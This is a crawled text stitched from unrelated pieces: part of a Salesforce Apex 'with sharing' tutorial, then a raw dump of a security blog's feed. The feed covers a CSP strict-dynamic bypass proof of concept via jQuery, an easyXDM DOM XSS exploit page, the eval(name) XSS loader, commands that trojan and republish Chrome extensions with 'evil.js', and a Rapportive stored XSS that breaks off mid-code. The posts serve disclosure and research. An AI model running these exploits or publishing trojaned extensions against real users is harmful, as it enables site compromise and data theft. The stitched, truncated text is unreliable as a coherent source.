It’s as simple as that! To take advantage of this benefit, you need to declare all classes (including virtual and abstract classes) with “with sharing” keywords. Now let’s fix our app.
- Click on the Sharing Demo tab.
- Click on the Apex Controller link.
- Click Edit to modify the Apex. Change the class definition from
public class Sharing_Demo {to
public with sharing class Sharing_Demo {
- Navigate back to the Sharing Demo tab and select the Farmer user from the dropdown.
- Click View Contents of Coin Purse.
Now you see only the Farmer’s gold supply, not information about other users. Perfect!
Now that you see how important the “with sharing” keyword is, you may be asking where exactly you need to apply it. The best approach is to apply it everywhere you need to enforce sharing rules. This includes inner classes, asynchronous Apex, and Apex triggers.
Sharing in Inner Classes
When working with classes that define an inner class, make sure you apply sharing to both class definitions. Sharing isn’t inherited from an outer class. Below is an example of how to apply sharing to both outer and inner classes.
public with sharing outerClass{ public with sharing innerclass { [...] } }
Sharing in Asynchronous Apex
It’s important to enforce sharing on your asynchronous Apex classes as well. Sharing doesn’t depend on whether the class executes asynchronously as a scheduled job or batch job. If your class accesses standard or custom fields, prevent sharing violations by declaring the “with sharing” keyword.
For example:
public class asyncClass implements Queueable {
Should be declared as:
public with sharing class asyncClass implements Queueable {
Sharing in Apex Triggers
Invoking a trigger from a class without sharing is also insecure. Remember that Apex triggers run in system context. By default they run without taking sharing rules into account.
Here’s an example.
public class OpportunityTriggerHandler extends TriggerHandler { public override void afterUpdate() { List opps = [SELECT Id, AccountId FROM Opportunity WHERE Id IN :Trigger.newMap.keySet()]; Account acc = [SELECT Id, Name FROM Account WHERE Id = :opps.get(0).AccountId]; Case c = new Case(); c.Subject = 'My Bypassed Case'; TriggerHandler.bypass('CaseTriggerHandler'); insert c; // won't invoke the CaseTriggerHandler TriggerHandler.clearBypass('CaseTriggerHandler'); c.Subject = 'No More Bypass'; update c; // will invoke the CaseTriggerHandler } }
Because the class isn’t defined “with sharing,” it lets the user see all Opportunities that he/she does not have the access to view.
To prevent this sharing violation, define the class with sharing.
public with sharing class OpportunityTriggerHandler extends TriggerHandler {
So remember that whenever you write Apex, whether you’re writing a trigger, async, or just a regular controller, always define the class with the “with sharing” keyword to ensure that sharing rules are enforced. | https://trailhead.salesforce.com/en/content/learn/modules/data-leak-prevention/identify-and-prevent-sharing-violations?trail_id=security_developer | CC-MAIN-2019-22 | en | refinedweb |
tag:blogger.com,1999:blog-36502598709982522422019-05-10T12:51:11.604+02:00the world. according to kotoon security, malware, cryptography, pentesting, javascript, php and [email protected]:blogger.com,1999:blog-3650259870998252242.post-63431981275037699552016-06-28T17:52:00.000+02:002016-06-30T11:37:05.499+02:00Reflections on trusting CSP<div dir="ltr" style="text-align: left;" trbidi="on"> Tldr; new changes in CSP sweep a huge number of the vulns, yet they enable new bypasses. Internet lives on, ignoring CSP.<b id="docs-internal-guid-18c4759f-9766-6346-b52d-d8bf1a71c08d" style="font-weight: normal;"><br /></b><br /> <br /> Let’s talk about <a href="">CSP</a> today: <br /> <blockquote class="tr_bq"> Content Security Policy (CSP) - a tool which developers can use to lock down their applications in various ways,<b> mitigating the risk of content injection vulnerabilities such as cross-site scripting</b>, and reducing the privilege with which their applications execute.</blockquote> <div> <h2> Assume XSS, mkay?</h2> CSP is a defense-in-depth web feature that aims to mitigate XSS (for simplicity, let’s ignore other types of vulnerabilities CSP struggles with). Therefore in the discussion we can safely <b>assume there is an XSS flaw</b> in the first place in an application (otherwise, CSP is a no-op).<br /> <br /> With this assumption, effective CSP is one that stops the XSS attacks while allowing execution of legitimate JS code. For any complex website, the legitimate code is either:<br /> <ul style="text-align: left;"> <li>application-specific code, implementing its business logic, or</li> <li>code of its dependencies (frameworks, libraries, 3rd party widgets)</li> </ul> Let’s see how CSP deals with both of them separately.</div> <h2 style="text-align: left;"> Just let me run my code!</h2> <div> When CSP was created, the XSS was mostly caused by reflecting user input in the response (reflected XSS). The first attempt at solving this with CSP was then to move <b>every</b> JS snippet from HTML to a separate resource and disable inline script execution (as those are most likely XSS payloads reflected by the vulnerable application). In addition to providing security benefits, it also encouraged refactoring the applications (e.g. transitioning from spaghetti-code to MVC paradigms or separating the behavior from the view; this was hip at that time).<br /> <br /> Of course, this put a burden on application developers, as inline styles and scripts were prevalent back then - in the end almost noone used CSP. And so ‘unsafe-inline’ source expression was created. With it, it allowed the developers to use CSP <a href="">without the security it </a><a href="">provides</a> (as now the attacker could again inject code through reflected XSS).<br /> <br /> Introducing insecurity into a security feature to ease adoption is an interesting approach, but at least it’s <a href="">documented</a>:<br /> <blockquote class="tr_bq"> In either case, developers SHOULD NOT include either <a href="">'unsafe-inline'</a>, or data: as valid sources in their policies. Both enable XSS attacks by allowing code to be included directly in the document itself; they are best avoided completely.</blockquote> <b style="font-weight: normal;">That’s why this new expression used the </b><span style="font-family: "courier new" , "courier" , monospace;"><b style="font-weight: normal;">unsafe-</b></span><b style="font-weight: normal;"> prefix. If you’re opting out of security benefits, at least you’re aware of it. Later on this was made secure again when nonces were introduced. From then on, <span style="font-family: "courier new" , "courier" , monospace;">script-src 'unsafe-inline' 'nonce-12345'</span> would only allow inline scripts if the <span style="font-family: "courier new" , "courier" , monospace;">nonce</span> attribute had a given value.</b><br /> <br /> Unless the attacker knew the nonce (or the reflection was in the body of a nonced script), their XSS payload would be stopped. Developers then had a way to use inline scripts in a safe fashion. </div> <h2 style="text-align: left;"> But what about my dependencies?</h2> <div> Most of the application dependencies were hosted on CDNs, and had to continue working after CSP was enabled in the application. CSP allowed developers to specify allowed URLs / paths and origins, from which the scripts could be loaded. Anything not on the whitelist would be stopped. <br /> <br /> By using the whitelist in CSP you effectively declared that you trusted whatever scripts were there on it. You might not have the control over it (e.g. it’s not sourced from your servers), but you <b>trust</b> it - and it had to be listed explicitly.<br /> <br /> Obviously, there were a bunch of bypasses (remember, we assume the XSS flaw is present!) - for one, a lot of CDNs are hosting libraries that <a href="*t,-it%27s-CSP!%22)">execute JS from the page markup</a>, rendering CSP useless as long as certain CDNs are whitelisted. There were also different bypasses related to path & redirections (<a href="">CSP Oddities presentation</a> summarizes those bypasses in a great way). <br /> <br /> In short, it was a mess - also for maintenance. For example, this is a script-src from Gmail:</div> <div> <blockquote class="tr_bq"> <span style="font-family: "courier new" , "courier" , monospace;">script-src 'self' 'unsafe-inline' 'unsafe-eval' https://*.talkgadget.google.com/</span></blockquote> <br /> Why so many sources? Well, if a certain script from, say <a href=""></a> loads a new script, it needs to be whitelisted too.<br /> <br /> There are various quirks and bypasses with this type of CSP, but at least it’s <b>explicit</b>. If a feature is unsafe, it’s marked as so, together with the trust I put into all other origins - and that trust is not transitive. Obviously, at the same time it’s very hard to adopt and maintain such a CSP for a given application, especially if your dependencies change their code. <br /> <br /> <div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;"> The solution for that problem was recently proposed in the form of <span style="font-family: "courier new" , "courier" , monospace;">strict-dynamic</span> source expression. </div> <div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;"> <h2 style="text-align: left;"> <span style="text-decoration-color: initial; text-decoration-style: initial;">Let's be strict!</span></h2> What’s <span style="font-family: "courier new" , "courier" , monospace;">strict-dynamic</span>? Let’s look at the <a href="">CSP spec</a> itself:</div> <blockquote class="tr_bq"> The "<a href="">'strict-dynamic'</a>" source expression aims to make Content Security Policy simpler to deploy for existing applications who have a high degree of confidence in the scripts they load directly, but low confidence in their ability to provide a reasonably secure whitelist. </blockquote> <blockquote class="tr_bq"> If present in a script-src or default-src directive, it has two main effects: </blockquote> <blockquote class="tr_bq"> 1. host-source and scheme-source expressions, as well as the "'unsafe-inline'" and "'self' keyword-sources will be ignored when loading script.<br /> 2. hash-source and nonce-source expressions will be honored. Script requests which are triggered by non-parser-inserted script elements are allowed.<br /> <br /> The first change allows you to deploy "<a href="">'strict-dynamic'</a> in a backwards compatible way, without requiring user-agent sniffing: the policy <span style="font-family: "courier new" , "courier" , monospace;">'unsafe-inline' https: 'nonce-abcdefg' 'strict-dynamic'</span> will act like <span style="font-family: "courier new" , "courier" , monospace;">'unsafe-inline' https:</span> in browsers that support CSP1, <span style="font-family: "courier new" , "courier" , monospace;">https: 'nonce-abcdefg'</span> in browsers that support CSP2, and <span style="font-family: "courier new" , "courier" , monospace;">'nonce-abcdefg' 'strict-dynamic'</span> in browsers that support CSP3. </blockquote> <blockquote class="tr_bq"> The second allows scripts which are given access to the page via nonces or hashes to <b>bring in their dependencies without adding them explicitly to the page’s policy</b>.</blockquote> While it might not be obvious from the first read, it introduces a <a href="">transitive trust</a> concept into the CSP. Strict-dynamic (in supporting browsers) turns off the whitelists completely. Now whenever an already allowed (e.g. because it carried a nonce) code creates a new script element and injects it into the DOM - its execution would not be stopped, regardless of its properties (e.g. the <span style="font-family: "courier new" , "courier" , monospace;">src</span> attribute value or a lack of a <span style="font-family: "courier new" , "courier" , monospace;">nonce</span>). Additionally, it could in turn create additional scripts. It’s like a tooth fairy handed off nonces to every new script element. <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="" /></a></div> <br /> As a consequence, now you’re not only trusting your <i>direct</i> dependencies, but also implicitly assume anything they would load at runtime is fair game for your application too. By using it you’re effectively trading control for ease of maintenance.<br /> <div style="margin-bottom: 6pt; margin-top: 18pt; text-align: left;"> </div> <h2 style="text-align: left;"> POC||GTFO</h2> Usefulness of CSP can be determined by its ability to stop the attack assuming there is an XSS flaw in the application. By dropping the whitelists it obviously increases the attack surface, even more so by introducing the transitive trust.</div> <div> <br /> On the other hand, it facilitates adopting a CSP policy that uses nonces. Enabling that, it mitigates a large chunk of reflected XSS flaws, as the injection point would have to be present inside a script element to execute (which is, I think, a rare occurrence). Unfortunately, DOM XSS flaws are much more common nowadays.<br /> <br /> For DOM XSS flaws, <span style="font-family: "courier new" , "courier" , monospace;">strict-dynamic </span>CSP would be worse than “legacy” CSP any time a code could be tricked into creating an attacker-controlled script (as old CSP would block it, but the new one would not). Unfortunately, such a flaw is likely present in a large number of applications. For example, here’s an exemplary exploit for applications using JQuery <3.0.0 using <a href="">this vuln</a>. <br /> <pre class="brush:html" name="code"><!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http- <script nonce='booboo' src="" ></script> </head> <body> <script nonce=booboo> // Patched in jQuery 3.0.0 // See // $(function() { // URL control in $.get / $.post is a CSP bypass // for CSP policies using strict-dynamic. $.get('data:text/javascript,"use strict"%0d%0aalert(document.domain)'); }); </script> </body> </html> </pre> <br /> Try it out (requires <a href="">Chrome 52</a>): <a href=""></a></div> <div> <br /> JQuery has a market share of over <a href="">96%</a>, so it’s not hard to imagine a large number of applications using <span style="font-family: "courier new" , "courier" , monospace;">$.get</span> / <span style="font-family: "courier new" , "courier" , monospace;">$.post</span> with controlled URLs. For those, <span style="font-family: "courier new" , "courier" , monospace;">strict-dynamic</span> policies are trivially bypassable.</div> <h2 style="text-align: left;"> Summary</h2> It was already demonstrated we can’t effectively understand and control what’s available in the CDNs we trust in our CSPs (so we can’t even maintain the whitelists we trust). How come losing control and making the trust transitive is a solution here?<br /> <br /> At the very least, these tradeoffs should be expressed by using an <span style="font-family: "courier new" , "courier" , monospace;">unsafe-</span> prefix. In fact, it used to be called <span style="font-family: "courier new" , "courier" , monospace;">unsafe-dynamic</span>, but that was <a href="">dropped</a> recently. So now we have a <span style="font-family: "courier new" , "courier" , monospace;">strict-*</span> expression that likely enabled bypasses that were not present with oldschool CSP. All that to ease adoption of a security mitigation. Sigh :/</div> <img src="" height="1" width="1" alt=""/>[email protected] crypto goto fail?<div dir="ltr" style="text-align: left;" trbidi="on"> <b>tldr; </b>A <b>long</b>, passionate discussion about JS crypto. Use slides for an overview.<br /> <br /> Javascript cryptography is on the rise. What used to be a <a href="">rich source of vulnerabilities</a> and regarded as "<a href="">not a serious research area</a>", suddenly becomes used by many. Over the last few years, there was a serious effort to develop libraries implementing cryptographic primitives and protocols in JS. So now we have at least:<br /> <ul style="text-align: left;"> <li><a href="">SJCL</a> - some crypto primitives</li> <li><a href="">Forge</a> - a TLS implementation</li> <li><a href="">OpenPGP.js </a>- OpenPGP implementation</li> <li><a href="">End-To-End</a> - OpenPGP + other crypto primitives</li> </ul> On top of that, there's a lot of fresh, new user-facing applications (<a href="">Whiteout.IO</a>, <a href="">Keybase.io</a>, <a href="">miniLock</a> to name just the fancy ones on <span style="font-family: Courier New, Courier, monospace;">.io</span> domains). JS crypto is used in websites, browser extensions, and server side-applications - whether we like it or not. It is time to look again at the challenges and limits of crunching secret numbers in Javascript.<br /> <a name='more'></a><h2 style="text-align: left;"> History</h2> <div> Let me give you a quick summary of JS crypto debate:<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="" height="230" width="320" /></a></div> <br /></div> <div> In 2009 Thomas Ptacek of Matasano announced that <a href="">JS crypto is considered harmful</a>, Nate Lawson stated <a href="">a similar thing</a>. In short, they mentioned the following problems:</div> <div> <ul style="text-align: left;"> <li <b>pointless</b>.</li> <li>XSSOMFG (and DOM is a mess). Code injections are common. JS crypto is as <b>insecure</b> as JS itself.</li> <li>There's no <a href="">CSPRNG</a>, no bytes, no <a href="">mlock()</a>, no BigNums and no good libraries to use. JS crypto is <b>hard, </b>because the language does not help you.</li> </ul> </div> <div> For years, these two articles dominated the views on the subject. Meanwhile, the world evolved - we've seen browser extensions written in JS, <a href="">nodejs</a> came along, <a href="">WebCrypto</a> was born and <a href="">CSP</a> arrived. Some of the arguments got simply outdated. <b>Someone was wrong on the internet.</b></div> <div> <b><br /></b></div> <div class="separator" style="clear: both; text-align: center;"> <a href=""><img border="0" src="" height="320" width="290" /></a></div> <div> <br /></div> <div> Last year the discussion started again. <a href="">Tony Arcieri</a> noted that in-browser crypto is dangerous mostly because the code can be backdoored by the server/attacker at anytime. Web is an <a href="">ephemeral</a> environment. He noted that browser extensions can solve this problem, as these behave more like a installable, auditable desktop applications. <a href="">Brendan McMillion</a> made a great post, noticing that Thomas simplified his arguments and did not specify the threat model (in short - security is not a bit value. You're not secure <i>period</i>, you're secure <i>against</i> an attacker with certain capabilities). </div> <div> <a href="">Thai Duong</a> admitted that JS crypto is hard, but doable. He provided some tips on how to overcome JS quirks, and noted examples when JS crypto is better than server-side approaches. He also dropped a super-cool vuln, but that went unnoticed.<br /> <br /></div> <div> Here's where I jump in.</div> <h2 style="text-align: left;"> Looking at the code</h2> <div> I have the unique opportunity to both participate in the (sometimes theoretical) <b>discussions</b> and deal with <b>code</b> of crypto applications written in JS. I took part in audits of several of them, and now I even develop one too. So I asked myself a few questions:<br /> <ul style="text-align: left;"> <li>What are the real challenges of JS crypto applications? </li> <li>What vulnerabilities are actually discovered, what are their root causes? </li> <li>Should we really worry about the issues raised a few years ago?</li> <li>What level of security can be achieved? Who can we be secure against?</li> <li>Can the JS crypto be somehow compared to "native" crypto?</li> </ul> <div> The answers to all these are in these slides, but let me expand a bit about some key points.</div> <div> <br /></div> <div> <iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" scrolling="no" src="" style="border: 1px solid rgb(204, 204, 204); margin-bottom: 5px; max-width: 100%;" width="427"></iframe></div> </div> <h2 style="text-align: left;"> It's all the same</h2> <div> Vulnerabilities in cryptographic code written in Javascript occur because of two reasons:</div> <div> <ol style="text-align: left;"> <li>Javascript as a language is weird sometimes</li> <li>Web platform is really inconvenient for cryptographic operations</li> </ol> </div> <div> To give you an example of language quirks, you can still trigger weird behaviour in a lot of JS libraries by using Unicode characters, because JS developers use <span style="font-family: Courier New, Courier, monospace;">String.fromCharCode()</span> assuming it returns 0-255. Weak typing often causes vulnerable code too. </div> <div> <br /></div> <div> XSS is an example of a web platform issue that breaks cryptographic code completely. Lack of good CSPRNG (and relying on <span style="font-family: Courier New, Courier, monospace;">Math.random()</span> ) is a web platform issue as well.<br /> <br /></div> <div> </div> <div> Surprisingly, similar problems are present in native crypto applications, and these also result in spectacular vulnerabilities. For example, sometimes the language gives you poor support for reporting error conditions and you end up having a <a href="">certificate validation bypass</a>. Or out-of-bound read is possible and Heartbleed happens. You might also kill your entropy like <a href="">Debian did</a> years ago. Skilful attacker might upgrade a buffer overflow in your <a href="">beloved crypto library</a> into RCE vulnerability, which is an equivalent of XSS in web security. </div> <div> <br /></div> <div> On both sides of the fence we face all the same issues, we're just not used to look at them this way.</div> <h2 style="text-align: left;"> Use extensions only</h2> <div> In-website cryptography is doomed. Let me repeat - don't implement cryptography on any document which location starts with <b>http. </b>It's a trust problem, well understood and it's a dead end.</div> <div> <br /></div> <div> The only sane model for JS crypto is a server-side application or a browser extension. As a bonus, for these environments XSS is much easier to tackle as you can control your inputs more easily and sometimes the platform helps you as well (e.g. obligatory CSP for Chrome Extensions). In practice, XSS in your crypto application can be a marginal, manageable problem, and not a fundamental issue.</div> <div> <h2 style="text-align: left;"> It's all fun and games...</h2> </div> <div> Once we established a ground rule of only supplying code in an installable browser extension, it's time to dig deeper. Are browser extensions <b>secure</b>? </div> <div> <br /></div> <div> We can only be secure in a given threat model, so let's look at our potential adversaries<b>. </b>We solved XSS (which any kid could exploit) and we solved server trust issues. Unlike websites, extensions need to be installed, so you only need to trust the server once, not every time you run the code. By doing this we're secure against man-in-the-middle attackers backdooring the code (or the service owner being pressured to "enhance" the code later on). At a glance, it looks like we achieved the level of security of native crypto applications. Yay!</div> <h2 style="text-align: left;"> Until someone gets hurt.</h2> <div> <h3 style="text-align: left;"> Autoupdates</h3> Not so fast. For once, browser extensions <b>autoupdate</b>. Silently. So the only way to trust the extension is to review it and install it manually (i.e. outside extension marketplace).<br /> <br /> But - is this a problem unique to web? Most desktop systems autoupdate software packages nowadays, and the updates are being pushed aggressively (and for a good reason!). That includes your precious OpenSSL too. </div> <div> <h3 style="text-align: left;"> Timing</h3> </div> <div> <b>Timing</b> is another open problem. It's most likely impossible to guarantee constant-time execution in a modern JS compiler. Even when your code is a perfect port of a constant-time C routine, you'll have timing sidechannels in places you wouldn't ever expect, because your JS engine decided at some point it would be a good idea to optimize the loop. The timing difference will be <i>probably non-exploitable</i>, but I've heard that statement falsified so many times, I'd rather not rely on it.</div> <div> <br /></div> <div> Again, this is something native crypto applications struggle with as well. Timing issues were discovered in GnuTLS, Java SSE, and OpenSSL to name the few. When fixing timing leaks, you sometimes even need to worry about CPU <a href="">microcode</a>. </div> <div> <h3 style="text-align: left;"> Memory safety</h3> </div> <div> <b>Memory safety</b> issues can bite you as well. Whaaat? We don't have buffer overflows in JS, right? Well, your Javascript code cannot introduce a buffer overflow, but the underlying JS engine implementation, and the browser with its HTML parser do have vulnerabilities too. Browsers get <a href="">pwnd</a>, you know, and your precious crypto extension can be pwned with them. All you need is to do is visit a website that triggers the exploit code. Luckily, here we assume a much more skilful (or rich) attacker, so you might just get away with claiming it's <i>outside your threat model</i>. </div> <div> <h2 style="text-align: left;"> Host security</h2> </div> <div> Arguing that implementing crypto in a browser extension is insecure because a browser might get pwned, is similar to pointing out the insecurity of OpenSSL because kernel exploits exist. <b>Host security</b> is still essential. Any binary you run can just read your precious <span style="font-family: Courier New, Courier, monospace;">~./ssh/id_rsa</span> and it's working-as-intended. What changed with JS is that now the attack surface is much greater, because:</div> <div> <ul style="text-align: left;"> <li>The browser is now your OS, and origins are just different users in this OS.</li> <li>Everyone in the world can execute a program on your OS. To put it boldly, web platform is just a gigantic drive-by-download marketplace. Visiting a page is equivalent to<br /><span style="font-family: 'Courier New', Courier, monospace;">wget; tar; ./configure; make; ./dist/kittenz</span></li> </ul> <div> Assuming the adversaries are powerful enough, some of those kittenz might bite your code badly.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="" height="200" width="320" /></a></div> <br /> But then again, are browser exploits that much easier to buy/develop than any other popular software and/or kernel exploits? Because these would have no problems with circumventing native crypto applications. After all, GnuPG was thwarted by a simple <a href="">keylogger</a>.<br /> <br /> JS crypto is not doomed. We made some real progress in the last few years, and will continue to do so. It's just that when facing some classes of attackers you're defenceless and we all need to understand that. </div> </div> </div> <img src="" height="1" width="1" alt=""/>[email protected] you don't have 0days. Client-side exploitation for the masses<div dir="ltr" style="text-align: left;" trbidi="on"> Yesterday me and <a href="">@antisnatchor</a> gave a talk at <a href="">Insomni'hack</a> entitled "When you don't have 0days. Client-side exploitation for the masses". We described different tricks that one can use during a pentesting assignment to achieve goals without burning any of those precious 0days.<br /> <br /> The tricks included the new <a href="">Chrome extension exploitation tools</a> ported recently to <a href="">BeEF</a> (by yours truly and @antisnatchor), HTA (HTML applications), Office macros, abusing UI expectations in IE, and some tricks with Java applets running on older Java. <a href="">Mosquito</a> was also demonstrated. Without further ado, here are the slides:="When you don't have 0days: client-side exploitation for the masses">When you don't have 0days: client-side exploitation for the masses</a> </strong> from <strong><a href="" target="_blank">Michele Orru</a></strong> <br /> <br /> All the video links for the demos are on the slides, the code is public and landed in BeEF in <span style="font-family: Courier New, Courier, monospace;">tools/ </span>subdirectory. The gist of the Chrome extensions part: you can now clone an arbitrary Chrome extension, add any code to it, and publish it back as your extension by doing:<br /> <br /> <pre name="code">$ cd beef/tools/chrome_extension_exploitation/ $ injector/repacker-webstore.sh <original-ext-id> zip repacked.zip evil.js “evil-permissions” $ ruby webstore_uploader/webstore_upload.rb repacked.zip publish </pre> <br /> Enjoy!</div> </div> <img src="" height="1" width="1" alt=""/>[email protected] with Shakespeare: Name-calling easyXDM<div dir="ltr" style="text-align: left;" trbidi="on"> <div style="text-align: left;"> <b>tl;dr</b>: window.name, DOM XSS & abusing Objects used as containers</div> <h2> What's in a name?</h2> <div> <div> "What's in a name? That which we call a rose</div> <div> By any other name would smell as sweet"<br /> <i><span style="font-size: x-small;">(Romeo & Juliet, Act II, Scene 2)</span></i></div> </div> <div> <br /></div> While Juliet probably was a pretty smart girl, this time she got it wrong. There <b>is</b> something special in a name. At least in <span style="font-family: Courier New, Courier, monospace;">window.name</span>. For example, it can ignore Same Origin Policy restrictions. Documents from and are isolated from each other, but they can "speak" through <span style="font-family: Courier New, Courier, monospace;">window.name</span>.<br /> <br /> Since <span style="font-family: Courier New, Courier, monospace;">name</span> is special for Same Origin Policy, it must have some evil usage, right? Right - the cutest one is that <span style="font-family: Courier New, Courier, monospace;">eval(name)</span>is the shortest XSS payload loader so far:<br /> <ul style="text-align: left;"> <li>create a window/frame</li> <li>put the payload in it's <span style="font-family: Courier New, Courier, monospace;">name</span></li> <li>just load <span style="font-family: Courier New, Courier, monospace;">"><script>eval(name)</script></span>.</li> </ul> But that's <a href="">old news</a> (I think it was <a href="">Gareth</a>'s trick, correct me if I'm wrong). This time I'll focus on exploiting software that uses <span style="font-family: Courier New, Courier, monospace;">window.name</span> for legitimate purposes. A fun practical challenge (found by accident, srsly)!<br /> <a name='more'></a><h2> Best men are moulded out of faults</h2> "They say, best men are moulded out of faults;<br /> And, for the most, become much more the better<br /> For being a little bad;"<br /> <i><span style="font-size: x-small;">(Measure for Measure, Act V, Scene 1)</span></i><br /> <br /> I have looked at <a href="">EasyXDM</a> in the past (<a href="">part 1</a>, <a href="">part 2</a>), so I won't bore your with introducing the project. This time I've found a <a href="">DOM XSS</a> vulnerability that allows the attacker to execute arbitrary code in context of any website using EasyXDM <= 2.4.18. It's fixed in <b>2.4.19</b> and has a <b>CVE-2014-1403</b> identifier. Unlike many other DOM XSSes (with oh-so-challenging <span style="font-family: Courier New, Courier, monospace;">location.href=location.hash.slice(1)</span> ), exploiting this was both fun & tricky, hence this blog post.<br /> <br /> Every EasyXDM installation has a <span style="font-family: Courier New, Courier, monospace;">name.html</span> document which assists in setting up the cross-document channels. This is the main part of the code that executes when you load the document:<br /> <br /> <pre class="brush:js;highlight:[3,8,9,18,19,20,21,22,23,24]" name="code"; } } } </pre> <br /> So we have a DOM XSS flaw - content in location hash can reach<span style="font-family: Courier New, Courier, monospace;"> location.href </span>assignment. After quick debugging (exercise left to the reader) we can see that the payload would look somewhat like this:<br /> <span style="font-family: Courier New, Courier, monospace;">name.html#_3channel,javascript:alert(document.domain)//</span><br /> <h2 style="text-align: left;"> Sea of troubles</h2> "To be, or not to be, that is the question—<br /> Whether 'tis Nobler in the mind to suffer<br /> The Slings and Arrows of outrageous Fortune,<br /> Or to take Arms against a Sea of troubles,<br /> And by opposing end them"<br /> <i><span style="font-size: x-small;">(The Tragedy of Hamlet, Prince of Denmark, Act III, Scene 1)</span></i><br /> <div> <i><span style="font-size: x-small;"><br /></span></i></div> It's not the end though. We still have some problems to overcome. Before <span style="font-family: Courier New, Courier, monospace;">location.href</span> gets assigned two statements must execute without throwing errors:<br /> <pre class="brush:js" name="code">var guest = window.parent.frames["easyXDM_" + channel + "_provider"]; guest.easyXDM.Fn.get(channel)(window.name); </pre> <b>First statement: </b>So we need to frame <span style="font-family: Courier New, Courier, monospace;">name.html</span>. No problem, it's supposed to be framed anyway (it's not a bug, it's a feature!). Then we need a separate <i>provider</i> frame, and this frame needs to be in-domain with <span style="font-family: Courier New, Courier, monospace;">name.html</span> and have an <span style="font-family: Courier New, Courier, monospace;">easyXDM.Fn</span> object available. Luckily, easyXDM project has a lot of <span style="font-family: Courier New, Courier, monospace;">.html</span> documents with easyXDM libraries initialized. Quickly looking at <span style="font-family: Courier New, Courier, monospace;">examples/</span> subdirectory we can pick e.g. <span style="font-family: Courier New, Courier, monospace;">example/bridge.html</span>. So, we need something like this:<br /> <pre class="brush:html" name="code"><iframe src= ></iframe> <iframe name="easyXDM_channel_provider" src=""> </iframe> </pre> <b>Second statement: </b><span style="font-family: Courier New, Courier, monospace;">guest.easyXDM.Fn.get(channel)(window.name)</span>. So, <span style="font-family: Courier New, Courier, monospace;">get()</span> (loaded from <span style="font-family: Courier New, Courier, monospace;">bridge.html</span> document) <b>must return a function accepting a string</b>. Let's look at what <span style="font-family: Courier New, Courier, monospace;">get()</span> does:<br /> <pre class="brush:js;highlight:[1,19]" name="code"; } }; </pre> Crap! It will return a function from some <span style="font-family: Courier New, Courier, monospace;">_map</span> container, but that container is initially empty! So we're basically doing: <span style="font-family: Courier New, Courier, monospace;">{}[channel](window.name)</span> - this will obviously fail quickly as <span style="font-family: Courier New, Courier, monospace;">{}[anything]</span> returns <span style="font-family: Courier New, Courier, monospace;">undefined</span>. And <span style="font-family: Courier New, Courier, monospace;">undefined</span> is definitely not a <span style="font-family: Courier New, Courier, monospace;">Function</span>. We can either try to find some other document or use more easyXDM magic that will fill the container before accessing it. Too much work. Let's use Javascript instead!<br /> <h2 style="text-align: left;"> "I know a trick worth two of that"</h2> <div> <i><span style="font-size: x-small;">(King Henry IV, Act II, Scene 1)</span></i><br /> <i><span style="font-size: x-small;"><br /></span></i> You see, empty object ({}) is not that empty. It inherits from it's prototype - <span style="font-family: Courier New, Courier, monospace;">Object.prototype<="320" /></a></td></tr> <tr><td class="tr-caption" style="text-align: center;">JS prototypical inheritance rulez!</td></tr> </tbody></table> So, naming our channel '<span style="font-family: Courier New, Courier, monospace;">constructor</span>' will cause two above JS statements to correctly execute, followed by <span style="font-family: Courier New, Courier, monospace;">location.hash</span> assignment - and that completes the exploit.<br /> <pre class="brush:html" name="code"><iframe id=f></iframe> <iframe name="easyXDM_constructor_provider" src="" onload="document.getElementById('f').</a></div> <h2> Rapportive (or LinkedIn Intro--)</h2> <a href="">Rapportive</a> is, among other things, a Chrome Extension (<a href="">link</a>) that "(...) shows you everything about your contacts right inside your inbox". The analyzed version (over 250000 users) is 1.4.1. Looking at it's security history, Jordan Wright has looked at Rapportive in the past and (ab)used it for <a href="">social engineering info gathering</a> - I couldn't find anything else.<br /> <br /> Business-wise Rapportive became so popular, that LinkedIn <a href="">bought it</a> and the team behind it is now responsible for <a href="">LinkedIn Intro</a>. Go figure.<br /> <br /> The extension is very thin. It only works on <span style="font-family: Courier New, Courier, monospace;"></span> website and just loads the main code from <span style="font-family: Courier New, Courier, monospace;"></span> by creating script nodes (that's why code updates don't require Chrome extension reinstallation). The main function of the script is to display rich info about the current Gmail contact in Gmail sidebar. Like this:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="" width="198" /></a></div> <br /> Current user = the one you highlighted, the one you write an email to, the one you're displaying conversation with etc. Once you sign up (via Google Account OAuth), you can also edit your info, that will show up to other users (you don't need to be related to the user or have previous conversation history). And, of course, within that info, there was a stored XSS (the vulnerability was reported and <b>fixed</b> before publishing this post). Let's look at what caused that vulnerability.<br /> <h2 style="text-align: left;"> Handlebars</h2> <div> Rapportive makes heavy usage of <a href="">Handlebars</a> - a JS templating engine. Like most of the current templating engines, it <b>autoescapes</b> the content, sanitizing it. Unless you ask it not to. by using <span style="font-family: Courier New, Courier, monospace;"><b>{{{</b>i_like_to_rock<b>}}}</b></span> instead of <span style="font-family: Courier New, Courier, monospace;"><b>{{</b>smooth_jazz_for_me<b>}}</b>. </span>In that case, you need to carefully escape not-trusted data yourself. To check for vulnerable places, you just need to look for <span style="font-family: Courier New, Courier, monospace;">{{{</span> in Handlebar templates. This is one example of what I've found in Rapportive:</div> <pre class="brush: js; highlight: [2,7,13,14,15,31,40]" name="code">client.templates["basic_info/_image_and_location"] = Handlebars.compile("<table class=\"basics\">... {{{ format_location contact/location }}}\n ..."); // triple {{{ marks the data as HTML and skips HTML escaping // contact/location is the value fetched from the server // format_location helper forwards to tracked_link helper helpers.format_location = function (params, location) { return helpers.tracked_link.call(this, params, '' + encodeURIComponent(location), // href 'Location link clicked', // tracking_tex 'location', // css_classes function () { // block return location.replace(/^([^,]*,[^,]*),.*/, '$1'); // look ma, no escaping here! }); } else { return ''; } // tracked_link wraps that into a link and compiles using handlebar() function helpers.tracked_link = function (params, href, tracking_text, css_classes, block) { return 